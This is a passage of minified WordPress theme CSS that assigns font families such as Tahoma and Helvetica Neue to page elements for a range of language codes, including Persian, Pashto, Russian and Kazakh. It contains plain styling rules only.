.has-drop-cap:lang(ckb):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ckb),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ckb),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ckb),.entry .entry-content .wp-block-cover-image h2:lang(ckb),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ckb),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ckb),.entry .entry-content .wp-block-cover h2:lang(ckb),.entry .entry-content .wp-block-audio figcaption:lang(ckb),.entry .entry-content .wp-block-video figcaption:lang(ckb),.entry .entry-content .wp-block-image figcaption:lang(ckb),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ckb),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ckb),.entry .entry-content .wp-block-file:lang(ckb),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ckb),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ckb),.wp-caption-text:lang(ckb),.gallery-caption:lang(ckb){font-family:Tahoma,Arial,sans-serif}body:lang(fa-IR),button:lang(fa-IR),input:lang(fa-IR),select:lang(fa-IR),optgroup:lang(fa-IR),textarea:lang(fa-IR),.author-description .author-link:lang(fa-IR),.comment-metadata:lang(fa-IR),.comment-reply-link:lang(fa-IR),.comments-title:lang(fa-IR),.comment-author .fn:lang(fa-IR),.discussion-meta-info:lang(fa-IR),.entry-meta:lang(fa-IR),.entry-footer:lang(fa-IR),.main-navigation:lang(fa-IR),.no-comments:lang(fa-IR),.not-found .page-title:lang(fa-IR),.error-404 .page-title:lang(fa-IR),.post-navigation .post-title:lang(fa-IR),.page-links:lang(fa-IR),.page-description:lang(fa-IR),.pagination .nav-links:lang(fa-IR),.sticky-post:lang(fa-IR),.site-title:lang(fa-IR),.site-info:lang(fa-IR),#cancel-comment-reply-link:lang(fa-IR),h1:lang(fa-IR),h2:lang(fa-IR),h3:lang(fa-IR),h4:lang(fa-IR),h5:lang(fa-IR),h6:lang(fa-IR),.page-title:lang(fa-IR),blockquote cite:lang(fa-IR),table:lang(fa-IR),.button:lang(fa-IR),input:lang(fa-IR)[type=button],input:lang(fa-IR)[type=reset],input:lang(fa-IR)[type=submit],.comment-navigation .nav-previous:lang(fa-IR),.comment-navigation .nav-next:lang(fa-IR),.comment-list .pingback .comment-body:lang(fa-IR),.comment-list .trackback .comment-body:lang(fa-IR),.comment-list .pingback .comment-body .comment-edit-link:lang(fa-IR),.comment-list .trackback .comment-body .comment-edit-link:lang(fa-IR),.comment-form .comment-notes:lang(fa-IR),.comment-form label:lang(fa-IR),.widget_archive ul li:lang(fa-IR),.widget_categories ul li:lang(fa-IR),.widget_meta ul li:lang(fa-IR),.widget_nav_menu ul li:lang(fa-IR),.widget_pages ul li:lang(fa-IR),.widget_recent_comments ul li:lang(fa-IR),.widget_recent_entries ul li:lang(fa-IR),.widget_rss ul li:lang(fa-IR),.widget_tag_cloud .tagcloud:lang(fa-IR),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(fa-IR),.entry .entry-content .wp-block-button .wp-block-button__link:lang(fa-IR),.entry .entry-content .wp-block-archives li>a:lang(fa-IR),.entry .entry-content .wp-block-categories li>a:lang(fa-IR),.entry .entry-content .wp-block-latest-posts li>a:lang(fa-IR),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(fa-IR),.entry .entry-content .wp-block-verse:lang(fa-IR),.entry .entry-content .has-drop-cap:lang(fa-IR):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(fa-IR),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(fa-IR),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(fa-IR),.entry .entry-content .wp-block-cover-image h2:lang(fa-IR),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(fa-IR),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(fa-IR),.entry .entry-content .wp-block-cover h2:lang(fa-IR),.entry .entry-content .wp-block-audio figcaption:lang(fa-IR),.entry .entry-content .wp-block-video figcaption:lang(fa-IR),.entry .entry-content .wp-block-image figcaption:lang(fa-IR),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(fa-IR),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(fa-IR),.entry .entry-content .wp-block-file:lang(fa-IR),.entry .entry-content .wp-block-file .wp-block-file__button:lang(fa-IR),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(fa-IR),.wp-caption-text:lang(fa-IR),.gallery-caption:lang(fa-IR){font-family:Tahoma,Arial,sans-serif}body:lang(haz),button:lang(haz),input:lang(haz),select:lang(haz),optgroup:lang(haz),textarea:lang(haz),.author-description .author-link:lang(haz),.comment-metadata:lang(haz),.comment-reply-link:lang(haz),.comments-title:lang(haz),.comment-author .fn:lang(haz),.discussion-meta-info:lang(haz),.entry-meta:lang(haz),.entry-footer:lang(haz),.main-navigation:lang(haz),.no-comments:lang(haz),.not-found .page-title:lang(haz),.error-404 .page-title:lang(haz),.post-navigation .post-title:lang(haz),.page-links:lang(haz),.page-description:lang(haz),.pagination .nav-links:lang(haz),.sticky-post:lang(haz),.site-title:lang(haz),.site-info:lang(haz),#cancel-comment-reply-link:lang(haz),h1:lang(haz),h2:lang(haz),h3:lang(haz),h4:lang(haz),h5:lang(haz),h6:lang(haz),.page-title:lang(haz),blockquote cite:lang(haz),table:lang(haz),.button:lang(haz),input:lang(haz)[type=button],input:lang(haz)[type=reset],input:lang(haz)[type=submit],.comment-navigation .nav-previous:lang(haz),.comment-navigation .nav-next:lang(haz),.comment-list .pingback .comment-body:lang(haz),.comment-list .trackback .comment-body:lang(haz),.comment-list .pingback .comment-body .comment-edit-link:lang(haz),.comment-list .trackback .comment-body .comment-edit-link:lang(haz),.comment-form .comment-notes:lang(haz),.comment-form label:lang(haz),.widget_archive ul li:lang(haz),.widget_categories ul li:lang(haz),.widget_meta ul li:lang(haz),.widget_nav_menu ul li:lang(haz),.widget_pages ul li:lang(haz),.widget_recent_comments ul li:lang(haz),.widget_recent_entries ul li:lang(haz),.widget_rss ul li:lang(haz),.widget_tag_cloud .tagcloud:lang(haz),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(haz),.entry .entry-content .wp-block-button .wp-block-button__link:lang(haz),.entry .entry-content .wp-block-archives li>a:lang(haz),.entry .entry-content .wp-block-categories li>a:lang(haz),.entry .entry-content .wp-block-latest-posts li>a:lang(haz),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(haz),.entry .entry-content .wp-block-verse:lang(haz),.entry .entry-content .has-drop-cap:lang(haz):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(haz),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(haz),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(haz),.entry .entry-content .wp-block-cover-image h2:lang(haz),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(haz),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(haz),.entry .entry-content .wp-block-cover h2:lang(haz),.entry .entry-content .wp-block-audio figcaption:lang(haz),.entry .entry-content .wp-block-video figcaption:lang(haz),.entry .entry-content .wp-block-image figcaption:lang(haz),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(haz),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(haz),.entry .entry-content .wp-block-file:lang(haz),.entry .entry-content .wp-block-file .wp-block-file__button:lang(haz),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(haz),.wp-caption-text:lang(haz),.gallery-caption:lang(haz){font-family:Tahoma,Arial,sans-serif}body:lang(ps),button:lang(ps),input:lang(ps),select:lang(ps),optgroup:lang(ps),textarea:lang(ps),.author-description .author-link:lang(ps),.comment-metadata:lang(ps),.comment-reply-link:lang(ps),.comments-title:lang(ps),.comment-author .fn:lang(ps),.discussion-meta-info:lang(ps),.entry-meta:lang(ps),.entry-footer:lang(ps),.main-navigation:lang(ps),.no-comments:lang(ps),.not-found .page-title:lang(ps),.error-404 .page-title:lang(ps),.post-navigation .post-title:lang(ps),.page-links:lang(ps),.page-description:lang(ps),.pagination .nav-links:lang(ps),.sticky-post:lang(ps),.site-title:lang(ps),.site-info:lang(ps),#cancel-comment-reply-link:lang(ps),h1:lang(ps),h2:lang(ps),h3:lang(ps),h4:lang(ps),h5:lang(ps),h6:lang(ps),.page-title:lang(ps),blockquote cite:lang(ps),table:lang(ps),.button:lang(ps),input:lang(ps)[type=button],input:lang(ps)[type=reset],input:lang(ps)[type=submit],.comment-navigation .nav-previous:lang(ps),.comment-navigation .nav-next:lang(ps),.comment-list .pingback .comment-body:lang(ps),.comment-list .trackback .comment-body:lang(ps),.comment-list .pingback .comment-body .comment-edit-link:lang(ps),.comment-list .trackback .comment-body .comment-edit-link:lang(ps),.comment-form .comment-notes:lang(ps),.comment-form label:lang(ps),.widget_archive ul li:lang(ps),.widget_categories ul li:lang(ps),.widget_meta ul li:lang(ps),.widget_nav_menu ul li:lang(ps),.widget_pages ul li:lang(ps),.widget_recent_comments ul li:lang(ps),.widget_recent_entries ul li:lang(ps),.widget_rss ul li:lang(ps),.widget_tag_cloud .tagcloud:lang(ps),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ps),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ps),.entry .entry-content .wp-block-archives li>a:lang(ps),.entry .entry-content .wp-block-categories li>a:lang(ps),.entry .entry-content .wp-block-latest-posts li>a:lang(ps),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ps),.entry .entry-content .wp-block-verse:lang(ps),.entry .entry-content .has-drop-cap:lang(ps):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(ps),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(ps),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(ps),.entry .entry-content .wp-block-cover-image h2:lang(ps),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(ps),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(ps),.entry .entry-content .wp-block-cover h2:lang(ps),.entry .entry-content .wp-block-audio figcaption:lang(ps),.entry .entry-content .wp-block-video figcaption:lang(ps),.entry .entry-content .wp-block-image figcaption:lang(ps),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(ps),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(ps),.entry .entry-content .wp-block-file:lang(ps),.entry .entry-content .wp-block-file .wp-block-file__button:lang(ps),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(ps),.wp-caption-text:lang(ps),.gallery-caption:lang(ps){font-family:Tahoma,Arial,sans-serif}body:lang(be),button:lang(be),input:lang(be),select:lang(be),optgroup:lang(be),textarea:lang(be),.author-description .author-link:lang(be),.comment-metadata:lang(be),.comment-reply-link:lang(be),.comments-title:lang(be),.comment-author .fn:lang(be),.discussion-meta-info:lang(be),.entry-meta:lang(be),.entry-footer:lang(be),.main-navigation:lang(be),.no-comments:lang(be),.not-found .page-title:lang(be),.error-404 .page-title:lang(be),.post-navigation .post-title:lang(be),.page-links:lang(be),.page-description:lang(be),.pagination .nav-links:lang(be),.sticky-post:lang(be),.site-title:lang(be),.site-info:lang(be),#cancel-comment-reply-link:lang(be),h1:lang(be),h2:lang(be),h3:lang(be),h4:lang(be),h5:lang(be),h6:lang(be),.page-title:lang(be),blockquote cite:lang(be),table:lang(be),.button:lang(be),input:lang(be)[type=button],input:lang(be)[type=reset],input:lang(be)[type=submit],.comment-navigation .nav-previous:lang(be),.comment-navigation .nav-next:lang(be),.comment-list .pingback .comment-body:lang(be),.comment-list .trackback .comment-body:lang(be),.comment-list .pingback .comment-body .comment-edit-link:lang(be),.comment-list .trackback .comment-body .comment-edit-link:lang(be),.comment-form .comment-notes:lang(be),.comment-form label:lang(be),.widget_archive ul li:lang(be),.widget_categories ul li:lang(be),.widget_meta ul li:lang(be),.widget_nav_menu ul li:lang(be),.widget_pages ul li:lang(be),.widget_recent_comments ul li:lang(be),.widget_recent_entries ul li:lang(be),.widget_rss ul li:lang(be),.widget_tag_cloud .tagcloud:lang(be),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(be),.entry .entry-content .wp-block-button .wp-block-button__link:lang(be),.entry .entry-content .wp-block-archives li>a:lang(be),.entry .entry-content .wp-block-categories li>a:lang(be),.entry .entry-content .wp-block-latest-posts li>a:lang(be),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(be),.entry .entry-content .wp-block-verse:lang(be),.entry .entry-content .has-drop-cap:lang(be):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(be),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(be),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(be),.entry .entry-content .wp-block-cover-image h2:lang(be),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(be),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(be),.entry .entry-content .wp-block-cover h2:lang(be),.entry .entry-content .wp-block-audio figcaption:lang(be),.entry .entry-content .wp-block-video figcaption:lang(be),.entry .entry-content .wp-block-image figcaption:lang(be),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(be),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(be),.entry .entry-content .wp-block-file:lang(be),.entry .entry-content .wp-block-file .wp-block-file__button:lang(be),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(be),.wp-caption-text:lang(be),.gallery-caption:lang(be){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(bg-BG),button:lang(bg-BG),input:lang(bg-BG),select:lang(bg-BG),optgroup:lang(bg-BG),textarea:lang(bg-BG),.author-description .author-link:lang(bg-BG),.comment-metadata:lang(bg-BG),.comment-reply-link:lang(bg-BG),.comments-title:lang(bg-BG),.comment-author .fn:lang(bg-BG),.discussion-meta-info:lang(bg-BG),.entry-meta:lang(bg-BG),.entry-footer:lang(bg-BG),.main-navigation:lang(bg-BG),.no-comments:lang(bg-BG),.not-found .page-title:lang(bg-BG),.error-404 .page-title:lang(bg-BG),.post-navigation .post-title:lang(bg-BG),.page-links:lang(bg-BG),.page-description:lang(bg-BG),.pagination .nav-links:lang(bg-BG),.sticky-post:lang(bg-BG),.site-title:lang(bg-BG),.site-info:lang(bg-BG),#cancel-comment-reply-link:lang(bg-BG),h1:lang(bg-BG),h2:lang(bg-BG),h3:lang(bg-BG),h4:lang(bg-BG),h5:lang(bg-BG),h6:lang(bg-BG),.page-title:lang(bg-BG),blockquote cite:lang(bg-BG),table:lang(bg-BG),.button:lang(bg-BG),input:lang(bg-BG)[type=button],input:lang(bg-BG)[type=reset],input:lang(bg-BG)[type=submit],.comment-navigation .nav-previous:lang(bg-BG),.comment-navigation .nav-next:lang(bg-BG),.comment-list .pingback .comment-body:lang(bg-BG),.comment-list .trackback .comment-body:lang(bg-BG),.comment-list .pingback .comment-body .comment-edit-link:lang(bg-BG),.comment-list .trackback .comment-body .comment-edit-link:lang(bg-BG),.comment-form .comment-notes:lang(bg-BG),.comment-form label:lang(bg-BG),.widget_archive ul li:lang(bg-BG),.widget_categories ul li:lang(bg-BG),.widget_meta ul li:lang(bg-BG),.widget_nav_menu ul li:lang(bg-BG),.widget_pages ul li:lang(bg-BG),.widget_recent_comments ul li:lang(bg-BG),.widget_recent_entries ul li:lang(bg-BG),.widget_rss ul li:lang(bg-BG),.widget_tag_cloud .tagcloud:lang(bg-BG),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(bg-BG),.entry .entry-content .wp-block-button .wp-block-button__link:lang(bg-BG),.entry .entry-content .wp-block-archives li>a:lang(bg-BG),.entry .entry-content .wp-block-categories li>a:lang(bg-BG),.entry .entry-content .wp-block-latest-posts li>a:lang(bg-BG),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(bg-BG),.entry .entry-content .wp-block-verse:lang(bg-BG),.entry .entry-content .has-drop-cap:lang(bg-BG):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(bg-BG),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(bg-BG),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(bg-BG),.entry .entry-content .wp-block-cover-image h2:lang(bg-BG),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(bg-BG),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(bg-BG),.entry .entry-content .wp-block-cover h2:lang(bg-BG),.entry .entry-content .wp-block-audio figcaption:lang(bg-BG),.entry .entry-content .wp-block-video figcaption:lang(bg-BG),.entry .entry-content .wp-block-image figcaption:lang(bg-BG),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(bg-BG),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(bg-BG),.entry .entry-content .wp-block-file:lang(bg-BG),.entry .entry-content .wp-block-file .wp-block-file__button:lang(bg-BG),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(bg-BG),.wp-caption-text:lang(bg-BG),.gallery-caption:lang(bg-BG){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(kk),button:lang(kk),input:lang(kk),select:lang(kk),optgroup:lang(kk),textarea:lang(kk),.author-description .author-link:lang(kk),.comment-metadata:lang(kk),.comment-reply-link:lang(kk),.comments-title:lang(kk),.comment-author .fn:lang(kk),.discussion-meta-info:lang(kk),.entry-meta:lang(kk),.entry-footer:lang(kk),.main-navigation:lang(kk),.no-comments:lang(kk),.not-found .page-title:lang(kk),.error-404 .page-title:lang(kk),.post-navigation .post-title:lang(kk),.page-links:lang(kk),.page-description:lang(kk),.pagination .nav-links:lang(kk),.sticky-post:lang(kk),.site-title:lang(kk),.site-info:lang(kk),#cancel-comment-reply-link:lang(kk),h1:lang(kk),h2:lang(kk),h3:lang(kk),h4:lang(kk),h5:lang(kk),h6:lang(kk),.page-title:lang(kk),blockquote cite:lang(kk),table:lang(kk),.button:lang(kk),input:lang(kk)[type=button],input:lang(kk)[type=reset],input:lang(kk)[type=submit],.comment-navigation .nav-previous:lang(kk),.comment-navigation .nav-next:lang(kk),.comment-list .pingback .comment-body:lang(kk),.comment-list .trackback .comment-body:lang(kk),.comment-list .pingback .comment-body .comment-edit-link:lang(kk),.comment-list .trackback .comment-body .comment-edit-link:lang(kk),.comment-form .comment-notes:lang(kk),.comment-form label:lang(kk),.widget_archive ul li:lang(kk),.widget_categories ul li:lang(kk),.widget_meta ul li:lang(kk),.widget_nav_menu ul li:lang(kk),.widget_pages ul li:lang(kk),.widget_recent_comments ul li:lang(kk),.widget_recent_entries ul li:lang(kk),.widget_rss ul li:lang(kk),.widget_tag_cloud .tagcloud:lang(kk),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(kk),.entry .entry-content .wp-block-button .wp-block-button__link:lang(kk),.entry .entry-content .wp-block-archives li>a:lang(kk),.entry .entry-content .wp-block-categories li>a:lang(kk),.entry .entry-content .wp-block-latest-posts li>a:lang(kk),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(kk),.entry .entry-content .wp-block-verse:lang(kk),.entry .entry-content .has-drop-cap:lang(kk):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(kk),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(kk),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(kk),.entry .entry-content .wp-block-cover-image h2:lang(kk),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(kk),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(kk),.entry .entry-content .wp-block-cover h2:lang(kk),.entry .entry-content .wp-block-audio figcaption:lang(kk),.entry .entry-content .wp-block-video figcaption:lang(kk),.entry .entry-content .wp-block-image figcaption:lang(kk),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(kk),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(kk),.entry .entry-content .wp-block-file:lang(kk),.entry .entry-content .wp-block-file .wp-block-file__button:lang(kk),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(kk),.wp-caption-text:lang(kk),.gallery-caption:lang(kk){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(mk-MK),button:lang(mk-MK),input:lang(mk-MK),select:lang(mk-MK),optgroup:lang(mk-MK),textarea:lang(mk-MK),.author-description .author-link:lang(mk-MK),.comment-metadata:lang(mk-MK),.comment-reply-link:lang(mk-MK),.comments-title:lang(mk-MK),.comment-author .fn:lang(mk-MK),.discussion-meta-info:lang(mk-MK),.entry-meta:lang(mk-MK),.entry-footer:lang(mk-MK),.main-navigation:lang(mk-MK),.no-comments:lang(mk-MK),.not-found .page-title:lang(mk-MK),.error-404 .page-title:lang(mk-MK),.post-navigation .post-title:lang(mk-MK),.page-links:lang(mk-MK),.page-description:lang(mk-MK),.pagination .nav-links:lang(mk-MK),.sticky-post:lang(mk-MK),.site-title:lang(mk-MK),.site-info:lang(mk-MK),#cancel-comment-reply-link:lang(mk-MK),h1:lang(mk-MK),h2:lang(mk-MK),h3:lang(mk-MK),h4:lang(mk-MK),h5:lang(mk-MK),h6:lang(mk-MK),.page-title:lang(mk-MK),blockquote cite:lang(mk-MK),table:lang(mk-MK),.button:lang(mk-MK),input:lang(mk-MK)[type=button],input:lang(mk-MK)[type=reset],input:lang(mk-MK)[type=submit],.comment-navigation .nav-previous:lang(mk-MK),.comment-navigation .nav-next:lang(mk-MK),.comment-list .pingback .comment-body:lang(mk-MK),.comment-list .trackback .comment-body:lang(mk-MK),.comment-list .pingback .comment-body .comment-edit-link:lang(mk-MK),.comment-list .trackback .comment-body .comment-edit-link:lang(mk-MK),.comment-form .comment-notes:lang(mk-MK),.comment-form label:lang(mk-MK),.widget_archive ul li:lang(mk-MK),.widget_categories ul li:lang(mk-MK),.widget_meta ul li:lang(mk-MK),.widget_nav_menu ul li:lang(mk-MK),.widget_pages ul li:lang(mk-MK),.widget_recent_comments ul li:lang(mk-MK),.widget_recent_entries ul li:lang(mk-MK),.widget_rss ul li:lang(mk-MK),.widget_tag_cloud .tagcloud:lang(mk-MK),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(mk-MK),.entry .entry-content .wp-block-button .wp-block-button__link:lang(mk-MK),.entry .entry-content .wp-block-archives li>a:lang(mk-MK),.entry .entry-content .wp-block-categories li>a:lang(mk-MK),.entry .entry-content .wp-block-latest-posts li>a:lang(mk-MK),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(mk-MK),.entry .entry-content .wp-block-verse:lang(mk-MK),.entry .entry-content .has-drop-cap:lang(mk-MK):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(mk-MK),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(mk-MK),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(mk-MK),.entry .entry-content .wp-block-cover-image h2:lang(mk-MK),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(mk-MK),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(mk-MK),.entry .entry-content .wp-block-cover h2:lang(mk-MK),.entry .entry-content .wp-block-audio figcaption:lang(mk-MK),.entry .entry-content .wp-block-video figcaption:lang(mk-MK),.entry .entry-content .wp-block-image figcaption:lang(mk-MK),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(mk-MK),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(mk-MK),.entry .entry-content .wp-block-file:lang(mk-MK),.entry .entry-content .wp-block-file .wp-block-file__button:lang(mk-MK),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(mk-MK),.wp-caption-text:lang(mk-MK),.gallery-caption:lang(mk-MK){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(mn),button:lang(mn),input:lang(mn),select:lang(mn),optgroup:lang(mn),textarea:lang(mn),.author-description .author-link:lang(mn),.comment-metadata:lang(mn),.comment-reply-link:lang(mn),.comments-title:lang(mn),.comment-author .fn:lang(mn),.discussion-meta-info:lang(mn),.entry-meta:lang(mn),.entry-footer:lang(mn),.main-navigation:lang(mn),.no-comments:lang(mn),.not-found .page-title:lang(mn),.error-404 .page-title:lang(mn),.post-navigation .post-title:lang(mn),.page-links:lang(mn),.page-description:lang(mn),.pagination .nav-links:lang(mn),.sticky-post:lang(mn),.site-title:lang(mn),.site-info:lang(mn),#cancel-comment-reply-link:lang(mn),h1:lang(mn),h2:lang(mn),h3:lang(mn),h4:lang(mn),h5:lang(mn),h6:lang(mn),.page-title:lang(mn),blockquote cite:lang(mn),table:lang(mn),.button:lang(mn),input:lang(mn)[type=button],input:lang(mn)[type=reset],input:lang(mn)[type=submit],.comment-navigation .nav-previous:lang(mn),.comment-navigation .nav-next:lang(mn),.comment-list .pingback .comment-body:lang(mn),.comment-list .trackback .comment-body:lang(mn),.comment-list .pingback .comment-body .comment-edit-link:lang(mn),.comment-list .trackback .comment-body .comment-edit-link:lang(mn),.comment-form .comment-notes:lang(mn),.comment-form label:lang(mn),.widget_archive ul li:lang(mn),.widget_categories ul li:lang(mn),.widget_meta ul li:lang(mn),.widget_nav_menu ul li:lang(mn),.widget_pages ul li:lang(mn),.widget_recent_comments ul li:lang(mn),.widget_recent_entries ul li:lang(mn),.widget_rss ul li:lang(mn),.widget_tag_cloud .tagcloud:lang(mn),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(mn),.entry .entry-content .wp-block-button .wp-block-button__link:lang(mn),.entry .entry-content .wp-block-archives li>a:lang(mn),.entry .entry-content .wp-block-categories li>a:lang(mn),.entry .entry-content .wp-block-latest-posts li>a:lang(mn),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(mn),.entry .entry-content .wp-block-verse:lang(mn),.entry .entry-content .has-drop-cap:lang(mn):not(:focus):first-letter ,.entry .entry-content .wp-block-pullquote cite:lang(mn),.entry .entry-content .wp-block-cover-image .wp-block-cover-image-text:lang(mn),.entry .entry-content .wp-block-cover-image .wp-block-cover-text:lang(mn),.entry .entry-content .wp-block-cover-image h2:lang(mn),.entry .entry-content .wp-block-cover .wp-block-cover-image-text:lang(mn),.entry .entry-content .wp-block-cover .wp-block-cover-text:lang(mn),.entry .entry-content .wp-block-cover h2:lang(mn),.entry .entry-content .wp-block-audio figcaption:lang(mn),.entry .entry-content .wp-block-video figcaption:lang(mn),.entry .entry-content .wp-block-image figcaption:lang(mn),.entry .entry-content .wp-block-gallery .blocks-gallery-image figcaption:lang(mn),.entry .entry-content .wp-block-gallery .blocks-gallery-item figcaption:lang(mn),.entry .entry-content .wp-block-file:lang(mn),.entry .entry-content .wp-block-file .wp-block-file__button:lang(mn),.entry .entry-content .wp-block-latest-comments .wp-block-latest-comments__comment-meta:lang(mn),.wp-caption-text:lang(mn),.gallery-caption:lang(mn){font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,sans-serif}body:lang(ru-RU),button:lang(ru-RU),input:lang(ru-RU),select:lang(ru-RU),optgroup:lang(ru-RU),textarea:lang(ru-RU),.author-description .author-link:lang(ru-RU),.comment-metadata:lang(ru-RU),.comment-reply-link:lang(ru-RU),.comments-title:lang(ru-RU),.comment-author .fn:lang(ru-RU),.discussion-meta-info:lang(ru-RU),.entry-meta:lang(ru-RU),.entry-footer:lang(ru-RU),.main-navigation:lang(ru-RU),.no-comments:lang(ru-RU),.not-found .page-title:lang(ru-RU),.error-404 .page-title:lang(ru-RU),.post-navigation .post-title:lang(ru-RU),.page-links:lang(ru-RU),.page-description:lang(ru-RU),.pagination .nav-links:lang(ru-RU),.sticky-post:lang(ru-RU),.site-title:lang(ru-RU),.site-info:lang(ru-RU),#cancel-comment-reply-link:lang(ru-RU),h1:lang(ru-RU),h2:lang(ru-RU),h3:lang(ru-RU),h4:lang(ru-RU),h5:lang(ru-RU),h6:lang(ru-RU),.page-title:lang(ru-RU),blockquote cite:lang(ru-RU),table:lang(ru-RU),.button:lang(ru-RU),input:lang(ru-RU)[type=button],input:lang(ru-RU)[type=reset],input:lang(ru-RU)[type=submit],.comment-navigation .nav-previous:lang(ru-RU),.comment-navigation .nav-next:lang(ru-RU),.comment-list .pingback .comment-body:lang(ru-RU),.comment-list .trackback .comment-body:lang(ru-RU),.comment-list .pingback .comment-body .comment-edit-link:lang(ru-RU),.comment-list .trackback .comment-body .comment-edit-link:lang(ru-RU),.comment-form .comment-notes:lang(ru-RU),.comment-form label:lang(ru-RU),.widget_archive ul li:lang(ru-RU),.widget_categories ul li:lang(ru-RU),.widget_meta ul li:lang(ru-RU),.widget_nav_menu ul li:lang(ru-RU),.widget_pages ul li:lang(ru-RU),.widget_recent_comments ul li:lang(ru-RU),.widget_recent_entries ul li:lang(ru-RU),.widget_rss ul li:lang(ru-RU),.widget_tag_cloud .tagcloud:lang(ru-RU),.widget_calendar .calendar_wrap .wp-calendar-nav:lang(ru-RU),.entry .entry-content .wp-block-button .wp-block-button__link:lang(ru-RU),.entry .entry-content .wp-block-archives li>a:lang(ru-RU),.entry .entry-content .wp-block-categories li>a:lang(ru-RU),.entry .entry-content .wp-block-latest-posts li>a:lang(ru-RU),.entry .entry-content .wp-block-latest-posts .wp-block-latest-posts__post-date:lang(ru-RU),.entry .entry-content .wp-block-verse:lang(ru-RU),.entry .entry-content 